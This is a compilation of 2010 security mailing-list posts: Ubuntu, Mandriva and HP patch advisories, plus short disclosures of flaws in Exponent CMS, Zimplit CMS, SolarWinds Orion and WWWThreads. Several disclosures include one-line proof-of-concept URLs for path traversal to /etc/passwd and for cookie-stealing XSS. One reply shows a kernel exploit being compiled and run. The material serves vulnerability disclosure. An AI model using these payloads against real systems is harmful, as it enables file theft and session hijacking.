www.eVuln.com advisory: HTTP Response Splitting in WWWThreads (php version) Summary: http://evuln.com/vulns/156/summary.html Details: http://evuln.com/vulns/156/description.html ---Summary--- eVuln ID: EV0156 Software: n/a Vendor: WWWThreads Version: 2006.11.25 Critical Level: low Type: HTTP Response Splitting Status: Unpatched. No reply from developer(s) PoC: Available Solution: Not available Discovered by: Aliaksandr Hartsuyeu ( http://evuln.com/ ) Description $_SERVER["HTTP_REFERER"] value is included in an HTTP response header sent to a web user without being validated for malicious characters. Vulnerable script: reputation.php PoC/Exploit PoC code is available at: http://evuln.com/vulns/156/exploit.html -Solution-- Not available --Credit--- Vulnerability discovered by Aliaksandr Hartsuyeu http://evuln.com/sql-injection/cookie.html - recent advisories about sql injections in cookies
[USN-1027-1] Quagga vulnerabilities
=== Ubuntu Security Notice USN-1027-1 December 07, 2010 quagga vulnerabilities CVE-2010-2948, CVE-2010-2949 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu 9.10 Ubuntu 10.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: quagga 0.99.2-1ubuntu3.7 Ubuntu 8.04 LTS: quagga 0.99.9-2ubuntu1.4 Ubuntu 9.10: quagga 0.99.13-1ubuntu0.1 Ubuntu 10.04 LTS: quagga 0.99.15-1ubuntu0.1 In general, a standard system update will make all the necessary changes. Details follow: It was discovered that Quagga incorrectly handled certain Outbound Route Filtering (ORF) records. A remote authenticated attacker could use this flaw to cause a denial of service or potentially execute arbitrary code. The default compiler options for Ubuntu 8.04 LTS and later should reduce the vulnerability to a denial of service. (CVE-2010-2948) It was discovered that Quagga incorrectly parsed certain AS paths. A remote attacker could use this flaw to cause Quagga to crash, resulting in a denial of service. (CVE-2010-2949) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.2-1ubuntu3.7.diff.gz Size/MD5:35595 33d87fda16424363b5ed66d76a0e84d0 http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.2-1ubuntu3.7.dsc Size/MD5: 1411 dfa7ab569c6be50f015f0261a767dd68 http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.2.orig.tar.gz Size/MD5: 2185137 88087d90697fcf5fe192352634f340b3 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga-doc_0.99.2-1ubuntu3.7_all.deb Size/MD5: 664604 6ddb00d23f3d3fabbc1a35c9841a089a amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.2-1ubuntu3.7_amd64.deb Size/MD5: 1404736 31f4c356a361b0a1fe7c98e835f03d7e i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.2-1ubuntu3.7_i386.deb Size/MD5: 1198278 3e99ddcc24b9bd6fb69f1c6dda66daf3 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.2-1ubuntu3.7_powerpc.deb Size/MD5: 1351762 67ae0179e652e156153f835db2ede8e9 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.2-1ubuntu3.7_sparc.deb Size/MD5: 1322666 6b282053912522c536a80263e3f713f9 Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.9-2ubuntu1.4.diff.gz Size/MD5:38201 c7162c4df4238379c40f153ab9bcfe86 http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.9-2ubuntu1.4.dsc Size/MD5: 1625 cb3558332bc96c2caa5b804fdc758759 http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.9.orig.tar.gz Size/MD5: 2341067 4dbdaf91bf6609803819d97d5fccc4c9 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga-doc_0.99.9-2ubuntu1.4_all.deb Size/MD5: 661896 d8652bb4873a02f46d8d294683e84e38 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.9-2ubuntu1.4_amd64.deb Size/MD5: 1622304 7288179aa5eb7c264135ab9980219d42 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.9-2ubuntu1.4_i386.deb Size/MD5: 1464836 36ddbb4a047833b00efd1d4387e6bec3 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/q/quagga/quagga_0.99.9-2ubuntu1.4_lpia.deb Size/MD5: 1462038 5f4d47c79fe72cd2053d1c1b5f90799c powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/q/quagga/quagga_0.99.9-2ubuntu1.4_powerpc.deb Size/MD5: 1659270 40512b0af9e48b4f0a168056c9079f48 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/q/quagga/quagga_0.99.9-2ubuntu1.4_sparc.deb Size/MD5: 1521808 bb4a215458bac828223fe5d2327a9242 Updated packages for Ubuntu 9.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.13-1ubuntu0.1.diff.gz Size/MD5:35758 bc638ecdc3c5ba6875a5fa0650e823f6 http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.13-1ubuntu0.1.dsc Size/MD5: 2067 915cb6412ba0b183d30ccecfddc6305d http://security.ubuntu.com/ubunt
[USN-1026-1] Python Paste vulnerability
=== Ubuntu Security Notice USN-1026-1 December 07, 2010 paste vulnerability CVE-2010-2477 === A security issue affects the following Ubuntu releases: Ubuntu 10.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 10.04 LTS: python-paste1.7.2-4ubuntu1.2 In general, a standard system update will make all the necessary changes. Details follow: It was discovered that Python Paste did not properly sanitize certain strings, resulting in cross-site scripting (XSS) vulnerabilities. With cross-site scripting vulnerabilities, if a user were tricked into viewing server output during a crafted server request, a remote attacker could exploit this to modify the contents, or steal confidential data, within the same domain. Updated packages for Ubuntu 10.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/p/paste/paste_1.7.2-4ubuntu1.2.diff.gz Size/MD5: 8082 9e724e29311afd6ce7933ac42da6f11f http://security.ubuntu.com/ubuntu/pool/main/p/paste/paste_1.7.2-4ubuntu1.2.dsc Size/MD5: 2103 d4acd77a7f7d4461c11bc096b9434299 http://security.ubuntu.com/ubuntu/pool/main/p/paste/paste_1.7.2.orig.tar.gz Size/MD5: 373556 a6a58d08dc4bff91d5d1c519d2277f8a Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/p/paste/python-paste_1.7.2-4ubuntu1.2_all.deb Size/MD5: 400764 73601619b0d8077ede5ae8d64c67f50c signature.asc Description: This is a digitally signed message part
[security bulletin] HPSBMI02614 SSRT100344 rev.1 - HP webOS Contacts Application, Remote Execution of Arbitrary Code
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c02639302Version: 1 HPSBMI02614 SSRT100344 rev.1 - HP webOS Contacts Application, Remote Execution of Arbitrary Code NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2010-12-06Last Updated: 2010-12-06 Potential Security Impact: Remote execution of arbitrary code Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP webOS Contacts Application. This vulnerability could be exploited to execute arbitrary HTML or JavaScript. References: CVE-2010-4109 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP webOS 1.4.5 BACKGROUND CVSS 2.0 Base Metrics CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2010-4109(AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION The vulnerability can be resolved by updating affected devices to HP webOS version 2.0 or subsequent. This update will be provided automatically from the wireless carrier. Note: Until the update is available, users are advised to not open untrusted vCard files received via emails or messages. HISTORY Version:1 (rev.1) - 6 December 2010 Initial Release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: security-al...@hp.com Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches -check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems -verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing & Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. "HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement." Copyright 2009 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damag
[ MDVSA-2010:249 ] clamav
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:249 http://www.mandriva.com/security/ ___ Package : clamav Date: December 7, 2010 Affected: 2009.0, Corporate 4.0, Enterprise Server 5.0 ___ Problem Description: Multiple vulnerabilities were discovered and corrected in clamav: Multiple unspecified vulnerabilities in pdf.c in libclamav in ClamAV before 0.96.5 allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted PDF document (CVE-2010-4260, (CVE-2010-4479). Off-by-one error in the icon_cb function in pe_icons.c in libclamav in ClamAV before 0.96.5 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unspecified vectors. NOTE: some of these details are obtained from third party information (CVE-2010-4261). Packages for 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149&products_id=490 The updated clamav packages have been upgraded to the 0.96.5 version that is not vulnerable to these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4260 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4261 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4479 ___ Updated Packages: Mandriva Linux 2009.0: 9ead4a15ce0b94209cd072fdc0210d7c 2009.0/i586/clamav-0.96.5-0.1mdv2009.0.i586.rpm f07c8219761b696e26282fa852fbe4ad 2009.0/i586/clamav-db-0.96.5-0.1mdv2009.0.i586.rpm 5f3592e1ef8bc479e8791fbf6ed1c5b1 2009.0/i586/clamav-milter-0.96.5-0.1mdv2009.0.i586.rpm f94e7fff4f175c49da1d74a09074cc05 2009.0/i586/clamd-0.96.5-0.1mdv2009.0.i586.rpm 954bc02f355d263f29a12c450d4b057b 2009.0/i586/libclamav6-0.96.5-0.1mdv2009.0.i586.rpm 82e3c8b870a847b62a889effcf0df5ee 2009.0/i586/libclamav-devel-0.96.5-0.1mdv2009.0.i586.rpm ecd257622ed55d4990e042c6dd381c42 2009.0/SRPMS/clamav-0.96.5-0.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 2b84bb3db11ae2b7bfc6fe48a2e07ef7 2009.0/x86_64/clamav-0.96.5-0.1mdv2009.0.x86_64.rpm 8cdd574ed24d552aef5e4d3772963fab 2009.0/x86_64/clamav-db-0.96.5-0.1mdv2009.0.x86_64.rpm 802114d391b05e7c87ab19e2178ca324 2009.0/x86_64/clamav-milter-0.96.5-0.1mdv2009.0.x86_64.rpm 04d1665b37a93391ca619930440065b7 2009.0/x86_64/clamd-0.96.5-0.1mdv2009.0.x86_64.rpm 318b41bcab46e00e28bb627090a1ba0f 2009.0/x86_64/lib64clamav6-0.96.5-0.1mdv2009.0.x86_64.rpm 7e768e6a84594437e2aa901e1e032c89 2009.0/x86_64/lib64clamav-devel-0.96.5-0.1mdv2009.0.x86_64.rpm ecd257622ed55d4990e042c6dd381c42 2009.0/SRPMS/clamav-0.96.5-0.1mdv2009.0.src.rpm Corporate 4.0: f5a8398d84556589b37c7d4b83719526 corporate/4.0/i586/clamav-0.96.5-0.1.20060mlcs4.i586.rpm 2dff852878c15339603b8d90c90d02c9 corporate/4.0/i586/clamav-db-0.96.5-0.1.20060mlcs4.i586.rpm 5223406ce119a25634e7a8b9883f5c1d corporate/4.0/i586/clamav-milter-0.96.5-0.1.20060mlcs4.i586.rpm 9a05c1072414eaa6be27d4cb49c67c38 corporate/4.0/i586/clamd-0.96.5-0.1.20060mlcs4.i586.rpm 2b7b4887e66b5228d70174c7871e0557 corporate/4.0/i586/libclamav6-0.96.5-0.1.20060mlcs4.i586.rpm fe0f1b51afd4950f5ecd118f8d780990 corporate/4.0/i586/libclamav-devel-0.96.5-0.1.20060mlcs4.i586.rpm ee9b7ce35ad83dfec3b7ee4b68b1bafc corporate/4.0/SRPMS/clamav-0.96.5-0.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: 00f581cf11a21be74865a9884a1f85e0 corporate/4.0/x86_64/clamav-0.96.5-0.1.20060mlcs4.x86_64.rpm 416f4b1f73a168aeac08ee2ec1b86ee2 corporate/4.0/x86_64/clamav-db-0.96.5-0.1.20060mlcs4.x86_64.rpm 6e1939794dbb2d24762323a524d8ef5a corporate/4.0/x86_64/clamav-milter-0.96.5-0.1.20060mlcs4.x86_64.rpm df4a0f11d30599bd76978650d31bd50c corporate/4.0/x86_64/clamd-0.96.5-0.1.20060mlcs4.x86_64.rpm e1f72491d2f168aec358f0c9779dded4 corporate/4.0/x86_64/lib64clamav6-0.96.5-0.1.20060mlcs4.x86_64.rpm db4feea7479714e0ed63df6ece12ffa2 corporate/4.0/x86_64/lib64clamav-devel-0.96.5-0.1.20060mlcs4.x86_64.rpm ee9b7ce35ad83dfec3b7ee4b68b1bafc corporate/4.0/SRPMS/clamav-0.96.5-0.1.20060mlcs4.src.rpm Mandriva Enterprise Server 5: 7dbe85e2b4070fa055a58165dd5e2da1 mes5/i586/clamav-0.96.5-0.1mdvmes5.1.i586.rpm 07c0b919ab8bb87e79d285f5afa7184a mes5/i586/clamav-db-0.96.5-0.1mdvmes5.1.i586.rpm adb539f66833633598f4d421c203d265 mes5/i586/clamav-milter-0.96.5-0.1mdvmes5.1.i586.rpm f2170ba7bb9d2c23521b4b30dca179d8 mes5/i586/clamd-0.96.5-0.1mdvmes5.1.i586.rpm 6f0bb2908d770bebe256c4f2a49c4ece mes5/i586/libclamav6-0.96.5-0.1mdvmes5.1.i5
LFI in Exponent CMS
Vulnerability ID: HTB22718 Reference: http://www.htbridge.ch/advisory/lfi_in_exponent_cms_1.html Product: Exponent CMS Vendor: http://www.exponentcms.org/ ( http://www.exponentcms.org/ ) Vulnerable Version: 2.0.0pr2 Vendor Notification: 22 November 2010 Vulnerability Type: Local File Inclusion Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: High Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) Vulnerability Details: The vulnerability exists due to failure in the "/rss.php" script to properly sanitize user-supplied input in module variable. The following PoC is available: http://exponent/rss.php?module=../../../../../../../etc/passwd%00
Re: [Full-disclosure] Linux kernel exploit
On Wed, Dec 08, 2010 at 12:44:09AM +0300, Kai wrote: > > > Anyone tested this in sandbox yet? > > 00:37 linups:../expl/kernel > cat /etc/*release* > openSUSE 11.3 (i586) > VERSION = 11.3 > 00:37 linups:../expl/kernel > uname -r > 2.6.34.4-0.1-desktop > 00:37 linups:../expl/kernel > gcc _2.6.37.local.c -o test > 00:37 linups:../expl/kernel > ./test > [*] Failed to open file descriptors. openSUSE 11.2 and 11.3 do not have ECONET compiled, openSUSE 11.1 has ECONET, but not the 0 ptr deref issue. The CVE-2010-4258 problem is however in all openSUSEs. Temporary workaround (for all distributions, not just openSUSE): echo 1 > /proc/sys/kernel/panic_on_oops This will now panic the machine instead of making it exploitable. Ciao, Marcus
Multiple XSS in Solarwinds Orion NPM 10.1
Values placed in the URI of the browser are rendered correctly. Orion NPM 10.1 has just been released, so there is no known fix available as of yet. Examples: Most "variable=" that I've checked are vulnerable: http:///Orion/NetPerfMon/MapView.aspx?Map=4f89095c-35fa-4b1b-813f-231270=0225b7.OrionMap&Title=%3Cscript%3Ealert%28%27test%27%29%3C/script%3E http:///Orion/NetPerfMon/NodeDetails.aspx?NetObject=%3Cscript%3Ealert%28=%27test%27%29%3C/script%3E http:///Orion/NPM/InterfaceDetails.aspx?NetObject=%3Cscript%3Ealert%28%2=7test%27%29%3C/script%3E&I:100&view=InterfaceDetails http:///Orion/NetPerfMon/CustomChart.aspx?ChartName=%3Cscript%3Ealert%28=%27test%27%29%3C/script%3E&Title=&SubTitle=&SubTitle2=&Width=0&Height=0&NetObject=I:100&CustomPollerID=&Rows=&SampleSize=1M&Period=Yesterday&PlotStyle=&FontSize=1&NetObjectPrefix=I&SubsetColor=&R=YSubsetColor=&ResourceID=57&ShowTrend=True&ReturnTo= If you need more information please let me know. Is there a template I should fill out for these reports? If this is published, please publish under x0skel and NOT my name Thanks, John
[ MDVSA-2010:248 ] openssl
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:248 http://www.mandriva.com/security/ ___ Package : openssl Date: December 7, 2010 Affected: 2009.0, 2010.0, 2010.1, Corporate 4.0, Enterprise Server 5.0 ___ Problem Description: A vulnerability was discovered and corrected in openssl: OpenSSL before 0.9.8q, and 1.0.x before 1.0.0c, when SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG is enabled, does not properly prevent modification of the ciphersuite in the session cache, which allows remote attackers to force the use of an unintended cipher via vectors involving sniffing network traffic to discover a session identifier (CVE-2010-4180). Packages for 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149&products_id=490 The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4180 ___ Updated Packages: Mandriva Linux 2009.0: a4b19ac2810b464392bb2f3b5292fe67 2009.0/i586/libopenssl0.9.8-0.9.8h-3.9mdv2009.0.i586.rpm 6169959e4a5f0acbdab7269ac99baa8d 2009.0/i586/libopenssl0.9.8-devel-0.9.8h-3.9mdv2009.0.i586.rpm 64195ec5f2e7868a49c280d3a32168cd 2009.0/i586/libopenssl0.9.8-static-devel-0.9.8h-3.9mdv2009.0.i586.rpm 7a1c151567d7f9d364a79ecd63322d47 2009.0/i586/openssl-0.9.8h-3.9mdv2009.0.i586.rpm 6e96fc588f1921571046fbc14928e5a1 2009.0/SRPMS/openssl-0.9.8h-3.9mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: a77409f3bedc0446f8eda39281dbf7a4 2009.0/x86_64/lib64openssl0.9.8-0.9.8h-3.9mdv2009.0.x86_64.rpm feffaacd70224326c3582eb93156864b 2009.0/x86_64/lib64openssl0.9.8-devel-0.9.8h-3.9mdv2009.0.x86_64.rpm e2cb3f77f36b8b0a6ca214861bf79be3 2009.0/x86_64/lib64openssl0.9.8-static-devel-0.9.8h-3.9mdv2009.0.x86_64.rpm d6e667e012727d34442e23f91b005b40 2009.0/x86_64/openssl-0.9.8h-3.9mdv2009.0.x86_64.rpm 6e96fc588f1921571046fbc14928e5a1 2009.0/SRPMS/openssl-0.9.8h-3.9mdv2009.0.src.rpm Mandriva Linux 2010.0: 86223cb60de3ea76f185425da6b299f2 2010.0/i586/libopenssl0.9.8-0.9.8k-5.4mdv2010.0.i586.rpm 7624aa325a944ee5f4898dfd3a1c4340 2010.0/i586/libopenssl0.9.8-devel-0.9.8k-5.4mdv2010.0.i586.rpm 95ac866a31973ccf4c2e6d04012e7e67 2010.0/i586/libopenssl0.9.8-static-devel-0.9.8k-5.4mdv2010.0.i586.rpm 445c417e7de8145daefedf113b343ff5 2010.0/i586/openssl-0.9.8k-5.4mdv2010.0.i586.rpm 27fc76be287e1cd06adb2725df0c4167 2010.0/SRPMS/openssl-0.9.8k-5.4mdv2010.0.src.rpm Mandriva Linux 2010.0/X86_64: 391cb84677230e2c39708db0797b2e87 2010.0/x86_64/lib64openssl0.9.8-0.9.8k-5.4mdv2010.0.x86_64.rpm 7f251668cfd04bd1e2a634030c28929f 2010.0/x86_64/lib64openssl0.9.8-devel-0.9.8k-5.4mdv2010.0.x86_64.rpm 9110c45d54ce48c4ad0c8fe231f7f027 2010.0/x86_64/lib64openssl0.9.8-static-devel-0.9.8k-5.4mdv2010.0.x86_64.rpm 43e7eae967aad5b140eed29dab277aa2 2010.0/x86_64/openssl-0.9.8k-5.4mdv2010.0.x86_64.rpm 27fc76be287e1cd06adb2725df0c4167 2010.0/SRPMS/openssl-0.9.8k-5.4mdv2010.0.src.rpm Mandriva Linux 2010.1: 9cf211d5095ca7a5a82aa980d4eebd5d 2010.1/i586/libopenssl1.0.0-1.0.0a-1.6mdv2010.1.i586.rpm 788019361b199d0b6a0f3331294ac154 2010.1/i586/libopenssl1.0.0-devel-1.0.0a-1.6mdv2010.1.i586.rpm b2372b8919a8ab458ade4ce47080f7ff 2010.1/i586/libopenssl1.0.0-static-devel-1.0.0a-1.6mdv2010.1.i586.rpm cd5929de815b6eec25d1d683f4363db0 2010.1/i586/libopenssl-engines1.0.0-1.0.0a-1.6mdv2010.1.i586.rpm 60fee57d944361e4fa369412c71a59a9 2010.1/i586/openssl-1.0.0a-1.6mdv2010.1.i586.rpm 2f28a567af2f44df1fbac7006d27db5d 2010.1/SRPMS/openssl-1.0.0a-1.6mdv2010.1.src.rpm Mandriva Linux 2010.1/X86_64: ab021cadcaa131053ba5ac3940298f86 2010.1/x86_64/lib64openssl1.0.0-1.0.0a-1.6mdv2010.1.x86_64.rpm a2119fefbe8cfb649e88b3faf85ffba1 2010.1/x86_64/lib64openssl1.0.0-devel-1.0.0a-1.6mdv2010.1.x86_64.rpm 067878d8ff9ec0002c0a7653a1b87b05 2010.1/x86_64/lib64openssl1.0.0-static-devel-1.0.0a-1.6mdv2010.1.x86_64.rpm 60a8142259ee202b6327e8a2c0f86755 2010.1/x86_64/lib64openssl-engines1.0.0-1.0.0a-1.6mdv2010.1.x86_64.rpm a4c77c129fd43f7918075fadf461fe8b 2010.1/x86_64/openssl-1.0.0a-1.6mdv2010.1.x86_64.rpm 2f28a567af2f44df1fbac7006d27db5d 2010.1/SRPMS/openssl-1.0.0a-1.6mdv2010.1.src.rpm Corporate 4.0: 3f7610ee9ee7aa4b8d1ed3997e28d09b corporate/4.0/i586/libopenssl0.9.7-0.9.7g-2.13.20060mlcs4.i586.rpm 25a4686ef5ca8302eebf2f1b4fe67e35 corporate/4.0/i586/libopenssl0.9.7-devel-0.9.7g-2.13.20060mlcs4.i586.rpm c5f5a562293eae123b05a96d3ba663d7 corporate/4.0/i586/libopenssl0.9.7-static-dev
LFI in Exponent CMS
Vulnerability ID: HTB22717 Reference: http://www.htbridge.ch/advisory/lfi_in_exponent_cms.html Product: Exponent CMS Vendor: http://www.exponentcms.org/ ( http://www.exponentcms.org/ ) Vulnerable Version: 2.0.0pr2 Vendor Notification: 22 November 2010 Vulnerability Type: Local File Inclusion Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: High Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) Vulnerability Details: The vulnerability exists due to failure in the "/podcast.php" script to properly sanitize user-supplied input in module variable. The following PoC is available: http://exponent/podcast.php?module=../../../../../../../etc/passwd%00
XSS vulnerability in Zimplit CMS
Vulnerability ID: HTB22715 Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_zimplit_cms.html Product: Zimplit CMS Vendor: Zimplit ( http://www.zimplit.com/ ) Vulnerable Version: Current at 22.11.2010 and Probably Prior Versions Vendor Notification: 22 November 2010 Vulnerability Type: XSS (Cross Site Scripting) Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: Medium Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) Vulnerability Details: User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the "zimplit.php" script on "load" action to properly sanitize user-supplied input in "file" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. An attacker can use browser to exploit this vulnerability. The following PoC is available: http://host/path/zimplit.php?action=load&file=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
XSS vulnerability in Zimplit CMS
Vulnerability ID: HTB22716 Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_zimplit_cms_1.html Product: Zimplit CMS Vendor: Zimplit ( http://www.zimplit.com/ ) Vulnerable Version: Current at 22.11.2010 and Probably Prior Versions Vendor Notification: 22 November 2010 Vulnerability Type: XSS (Cross Site Scripting) Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: Medium Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) Vulnerability Details: User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the manual page to properly sanitize user-supplied input in "client" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. An attacker can use browser to exploit this vulnerability. The following PoC is available: http://host/path/English_manual_version_2.php?client=c%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E